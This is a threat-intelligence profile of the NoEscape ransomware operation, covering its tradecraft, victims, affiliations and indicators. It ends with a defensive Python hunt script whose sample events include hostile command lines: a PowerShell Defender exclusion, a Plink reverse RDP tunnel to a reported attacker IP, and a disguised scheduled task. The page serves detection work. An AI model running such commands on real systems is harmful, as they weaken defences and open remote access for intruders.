NoEscape
NoEscape is a ransomware-as-a-service (RaaS) operation first observed being advertised on a dark web forum in May 2023. Public reporting describes it as financially motivated, using double extortion (file encryption plus data exfiltration), with further extortion options including DDoS/spam services and call-center support. Multiple sources state that NoEscape is believed to be a spin-off or rebrand of the former Avaddon ransomware group.
Observed tradecraft includes exploitation of public-facing Microsoft Exchange servers via the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), webshell deployment, PowerShell-based Microsoft Defender exclusions, credential dumping from LSASS, and lateral movement primarily via RDP using valid domain credentials. In one NCC Group case, operators also tunneled RDP over SSH using PuTTY Link (Plink) to 172.93.181[.]238, leveraged existing TeamViewer access, exfiltrated data with MegaSync.exe to Mega cloud storage, and executed the encryptor via a scheduled task named "SystemUpdate." Reporting also describes a separate NGO intrusion in which NoEscape operators allegedly purchased previously established access to an unpatched on-premises Exchange environment, used the NPPSPY credential-theft technique via a malicious network provider DLL, installed AnyDesk for persistence, performed enumeration with Nmap/Zenmap and PowerView, and likely exfiltrated data to Mega. The ransomware encryptor was reported to target files on the C:\ drive while excluding numerous extensions.
Reporting links NoEscape to victim extortion and public leak-site activity. The victim portal reportedly listed 89 victims at the time of one report, with the first victim posted on 14 June 2023. Mentioned incidents include a June 2023 claim by NoEscape that it breached the University of Hawaii and stole 65 GB of sensitive data, and reporting tying NoEscape to an October 2023 attack involving the Order of Psychologists of the Lombardy Region, where data was allegedly exfiltrated and later published after ransom non-payment.
NoEscape appears in broader ransomware ecosystem reporting as one of the RaaS programs advertised on the RAMP cybercrime forum. Reporting also notes overlap between ransomware ecosystems: LockBitSupp encouraged ALPHV/BlackCat and NoEscape affiliates to use the LockBit leak site in late 2023, and Mikhail Matveev was reported to have worked as an affiliate for NoEscape in addition to several other ransomware groups. Separately, FBI reporting states that Iranian actors partnered with affiliates of NoEscape, Ransomhouse, and ALPHV and took a percentage of ransom payments.
Known indicators and artifacts reported include CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell); Mega-related IP 66.203.125[.]14; Plink remote endpoint 172.93.181[.]238; and a Meterpreter stager communicating with 103.112.232[.]44:443 in a case later attributed to NoEscape operators purchasing access.
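As an added illustration of how a detection engineer might operationalise the tradecraft and the indicators summarised above, the following Python hunt is example code written for this page; it is not from NoEscape reporting, NCC Group, or the Mallory platform. It runs a handful of rules over constructed process, registry and network events: PowerShell Defender exclusions, a scheduled task named "SystemUpdate", Plink forwarding port 3389, MegaSync.exe execution, an NPPSPY-style network provider DLL registration, and destination IPs matching the reported infrastructure. The IP addresses and the task name come from the reporting above; the hostnames, file paths, service name and benign events are made up for the sample, and the registry locations checked for the network provider rule come from public documentation of the NPPSPY technique rather than from this page.

```python
"""Hunt rules for NoEscape-style tradecraft over constructed (not real) telemetry."""
import re
from dataclasses import dataclass

# Indicators from the reporting summarised on this page, undefanged for matching.
NOESCAPE_IPS = {"172.93.181.238", "66.203.125.14", "103.112.232.44"}


def _defender_exclusion(cl: str) -> bool:
    # PowerShell Set-/Add-MpPreference with any -Exclusion* parameter
    return re.search(r"\b(set|add)-mppreference\b.*-exclusion(path|process|extension)", cl) is not None


def _systemupdate_task(cl: str) -> bool:
    # schtasks creating a task literally named SystemUpdate (name seen in the NCC Group case)
    return "schtasks" in cl and "/create" in cl and re.search(r'/tn\s+"?systemupdate"?(\s|$)', cl) is not None


def _plink_tunnel(cl: str) -> bool:
    # PuTTY Link forwarding a port to or from 3389, i.e. RDP over SSH
    return re.search(r"\bplink(\.exe)?\b.*\s-[rl]\s+\S*3389", cl) is not None


def _megasync(cl: str) -> bool:
    return "megasync.exe" in cl


# Rule name -> predicate over a lowercased process command line
PROCESS_RULES = {
    "defender_exclusion_via_powershell": _defender_exclusion,
    "scheduled_task_systemupdate": _systemupdate_task,
    "plink_rdp_over_ssh": _plink_tunnel,
    "megasync_exfil_tool": _megasync,
}


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    evidence: str


def hunt(events):
    """Apply the rules to a list of event dicts and return Findings in event order."""
    findings = []
    for ev in events:
        host = ev.get("host", "?")
        kind = ev.get("type")
        if kind == "process":
            cl = ev.get("cmdline", "").lower()
            for name, pred in PROCESS_RULES.items():
                if pred(cl):
                    findings.append(Finding(name, host, ev["cmdline"]))
        elif kind == "registry":
            key = ev.get("key", "").lower()
            value = ev.get("value", "").lower()
            # NPPSPY-style persistence: a provider DLL path registered under a service's
            # NetworkProvider key, or ProviderOrder edited so the new provider gets loaded
            if (key.endswith("\\networkprovider") and value == "providerpath") or (
                key.endswith("\\control\\networkprovider\\order") and value == "providerorder"
            ):
                evidence = f"{ev['key']}\\{ev['value']} = {ev.get('data', '')}"
                findings.append(Finding("network_provider_dll_registered", host, evidence))
        elif kind == "network":
            if ev.get("dst_ip") in NOESCAPE_IPS:
                findings.append(Finding("known_noescape_infrastructure", host, f"{ev['dst_ip']}:{ev.get('dst_port')}"))
    return findings


# Constructed sample telemetry: hostnames, paths, service name and benign lines are invented.
SAMPLE_EVENTS = [
    {"type": "process", "host": "exch01", "cmdline": 'powershell.exe -nop -c "Set-MpPreference -ExclusionPath C:\\Windows\\Temp"'},
    {"type": "process", "host": "exch01", "cmdline": "svchost.exe -k netsvcs -p"},
    {"type": "process", "host": "ws07", "cmdline": "plink.exe -ssh -N -R 12345:127.0.0.1:3389 user@172.93.181.238"},
    {"type": "network", "host": "ws07", "dst_ip": "172.93.181.238", "dst_port": 22},
    {"type": "registry", "host": "dc01", "key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\nppspy\\NetworkProvider",
     "value": "ProviderPath", "data": "C:\\Windows\\System32\\nppspy.dll"},
    {"type": "process", "host": "fs02", "cmdline": "C:\\Users\\svc\\AppData\\Local\\MEGAsync\\MEGAsync.exe"},
    {"type": "network", "host": "fs02", "dst_ip": "66.203.125.14", "dst_port": 443},
    {"type": "process", "host": "fs02", "cmdline": 'schtasks /create /tn "SystemUpdate" /tr C:\\ProgramData\\update.exe /sc once /st 03:00'},
    {"type": "network", "host": "fs02", "dst_ip": "8.8.8.8", "dst_port": 53},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.evidence}")
```

Run against the sample, the hunt yields seven findings and leaves the svchost and DNS events alone. In a real deployment the same predicates map naturally onto Sysmon event IDs 1 (process creation), 13 (registry value set) and 3 (network connection), and the IP set should be treated as low-confidence on its own because shared cloud endpoints such as Mega's are used legitimately.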
Recent activity
11 sources tracked across advisories, community write-ups, and news.
Ransomware operation whose affiliates were reportedly partnered with Iranian actors for financially motivated activity.
A ransomware-as-a-service program advertised on RAMP.
Ransomware operation that claims to breach organizations and steal sensitive data (e.g., 65GB in the cited June 2023 claim), typically to extort victims.
Ransomware operation referenced as having affiliates that partnered with Iranian actors for monetization.